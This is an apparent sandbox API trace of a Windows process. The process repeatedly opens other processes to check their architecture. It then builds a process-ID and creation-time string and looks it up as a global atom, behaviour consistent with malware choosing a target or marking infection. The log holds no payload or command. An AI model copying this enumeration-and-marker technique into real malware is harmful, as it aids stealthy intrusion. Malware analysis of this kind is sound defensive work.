	[0106.562] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.562] CloseHandle (hObject=0x694) returned 1
	[0106.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0106.562] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.562] CloseHandle (hObject=0x694) returned 1
	[0106.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0106.562] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.562] CloseHandle (hObject=0x694) returned 1
	[0106.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0106.562] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.562] CloseHandle (hObject=0x694) returned 1
	[0106.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0106.563] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.563] CloseHandle (hObject=0x694) returned 1
	[0106.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0106.563] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.563] CloseHandle (hObject=0x694) returned 1
	[0106.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0106.563] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.563] CloseHandle (hObject=0x694) returned 1
	[0106.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0106.563] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.563] CloseHandle (hObject=0x694) returned 1
	[0106.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0106.563] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.564] CloseHandle (hObject=0x694) returned 1
	[0106.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0106.564] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.564] CloseHandle (hObject=0x694) returned 1
	[0106.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0106.564] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.564] CloseHandle (hObject=0x694) returned 1
	[0106.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0106.564] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.564] CloseHandle (hObject=0x694) returned 1
	[0106.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0106.564] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.564] CloseHandle (hObject=0x694) returned 1
	[0106.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0106.565] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.565] CloseHandle (hObject=0x694) returned 1
	[0106.565] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0106.565] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.565] CloseHandle (hObject=0x694) returned 1
	[0106.565] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0106.565] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.565] CloseHandle (hObject=0x694) returned 1
	[0106.565] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0106.565] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.565] CloseHandle (hObject=0x694) returned 1
	[0106.565] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0106.565] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.565] CloseHandle (hObject=0x694) returned 1
	[0106.565] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0106.566] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.566] CloseHandle (hObject=0x694) returned 1
	[0106.566] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0106.566] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.566] CloseHandle (hObject=0x694) returned 1
	[0106.566] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0106.566] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.566] CloseHandle (hObject=0x694) returned 1
	[0106.566] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0106.566] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.567] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0106.567] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0106.567] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0106.567] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.567] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0106.567] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.568] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0106.568] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0106.568] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0106.568] CloseHandle (hObject=0x694) returned 1
	[0106.568] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0106.568] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0106.568] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.568] CloseHandle (hObject=0x694) returned 1
	[0106.568] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0106.568] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.568] CloseHandle (hObject=0x694) returned 1
	[0106.568] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0106.568] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.568] CloseHandle (hObject=0x694) returned 1
	[0106.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0106.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0106.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0106.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0106.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0106.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0106.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0106.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0106.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0106.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0106.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0106.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0106.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0106.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0106.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0106.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0106.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0106.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0106.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0106.629] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.629] CloseHandle (hObject=0x694) returned 1
	[0106.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0106.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0106.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0106.629] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.629] CloseHandle (hObject=0x694) returned 1
	[0106.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0106.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0106.629] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.629] CloseHandle (hObject=0x694) returned 1
	[0106.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0106.630] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.630] CloseHandle (hObject=0x694) returned 1
	[0106.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0106.630] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.630] CloseHandle (hObject=0x694) returned 1
	[0106.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0106.630] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.630] CloseHandle (hObject=0x694) returned 1
	[0106.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0106.630] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.630] CloseHandle (hObject=0x694) returned 1
	[0106.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0106.630] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.630] CloseHandle (hObject=0x694) returned 1
	[0106.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0106.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0106.631] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.631] CloseHandle (hObject=0x694) returned 1
	[0106.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0106.631] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.631] CloseHandle (hObject=0x694) returned 1
	[0106.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0106.631] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.631] CloseHandle (hObject=0x694) returned 1
	[0106.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0106.631] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.631] CloseHandle (hObject=0x694) returned 1
	[0106.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0106.631] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.632] CloseHandle (hObject=0x694) returned 1
	[0106.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0106.632] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.632] CloseHandle (hObject=0x694) returned 1
	[0106.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0106.632] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.632] CloseHandle (hObject=0x694) returned 1
	[0106.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0106.632] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.632] CloseHandle (hObject=0x694) returned 1
	[0106.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0106.632] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.632] CloseHandle (hObject=0x694) returned 1
	[0106.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0106.632] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.632] CloseHandle (hObject=0x694) returned 1
	[0106.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0106.633] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.633] CloseHandle (hObject=0x694) returned 1
	[0106.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0106.633] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.633] CloseHandle (hObject=0x694) returned 1
	[0106.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0106.633] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.633] CloseHandle (hObject=0x694) returned 1
	[0106.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0106.633] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.633] CloseHandle (hObject=0x694) returned 1
	[0106.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0106.633] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.633] CloseHandle (hObject=0x694) returned 1
	[0106.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0106.634] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.634] CloseHandle (hObject=0x694) returned 1
	[0106.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0106.634] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.634] CloseHandle (hObject=0x694) returned 1
	[0106.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0106.634] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.634] CloseHandle (hObject=0x694) returned 1
	[0106.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0106.634] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.634] CloseHandle (hObject=0x694) returned 1
	[0106.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0106.634] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.634] CloseHandle (hObject=0x694) returned 1
	[0106.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0106.634] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.635] CloseHandle (hObject=0x694) returned 1
	[0106.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0106.635] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.635] CloseHandle (hObject=0x694) returned 1
	[0106.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0106.635] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.635] CloseHandle (hObject=0x694) returned 1
	[0106.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0106.635] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.636] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0106.636] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0106.636] wsprintfA (in: param_1=0x39936c8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0106.636] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.636] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0106.637] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.637] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0106.637] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0106.637] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0106.637] CloseHandle (hObject=0x694) returned 1
	[0106.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0106.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0106.637] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.637] CloseHandle (hObject=0x694) returned 1
	[0106.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0106.637] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.638] CloseHandle (hObject=0x694) returned 1
	[0106.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0106.638] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.638] CloseHandle (hObject=0x694) returned 1
	[0106.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0106.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0106.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0106.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0106.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0106.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0106.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0106.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0106.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0106.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0106.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0106.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0106.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0106.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0106.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0106.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0106.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0106.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0106.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0106.676] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.676] CloseHandle (hObject=0x694) returned 1
	[0106.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0106.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0106.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0106.676] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.676] CloseHandle (hObject=0x694) returned 1
	[0106.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0106.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0106.677] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.677] CloseHandle (hObject=0x694) returned 1
	[0106.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0106.677] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.677] CloseHandle (hObject=0x694) returned 1
	[0106.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0106.677] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.677] CloseHandle (hObject=0x694) returned 1
	[0106.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0106.677] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.677] CloseHandle (hObject=0x694) returned 1
	[0106.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0106.678] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.678] CloseHandle (hObject=0x694) returned 1
	[0106.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0106.678] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.678] CloseHandle (hObject=0x694) returned 1
	[0106.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0106.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0106.678] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.678] CloseHandle (hObject=0x694) returned 1
	[0106.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0106.678] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.678] CloseHandle (hObject=0x694) returned 1
	[0106.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0106.679] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.679] CloseHandle (hObject=0x694) returned 1
	[0106.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0106.679] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.679] CloseHandle (hObject=0x694) returned 1
	[0106.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0106.679] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.679] CloseHandle (hObject=0x694) returned 1
	[0106.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0106.679] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.679] CloseHandle (hObject=0x694) returned 1
	[0106.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0106.679] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.679] CloseHandle (hObject=0x694) returned 1
	[0106.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0106.680] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.680] CloseHandle (hObject=0x694) returned 1
	[0106.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0106.680] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.680] CloseHandle (hObject=0x694) returned 1
	[0106.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0106.680] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
